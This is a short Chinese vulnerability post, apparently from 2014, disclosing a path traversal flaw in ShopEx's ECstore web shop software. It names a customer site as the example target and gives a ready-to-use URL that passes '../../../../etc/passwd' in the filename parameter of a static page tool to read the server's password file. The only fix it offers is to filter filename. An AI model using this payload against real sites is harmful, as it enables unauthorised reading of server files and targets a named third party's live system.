ShopE旗下产品ECstore任意文件遍历漏洞下载
-
来源:黑吧安全网 浏览:1645次 时间:2014-05-09
ShopE旗下产品ECstore任意文件遍历漏洞
官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:
http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
修复方案:
对filename进行过滤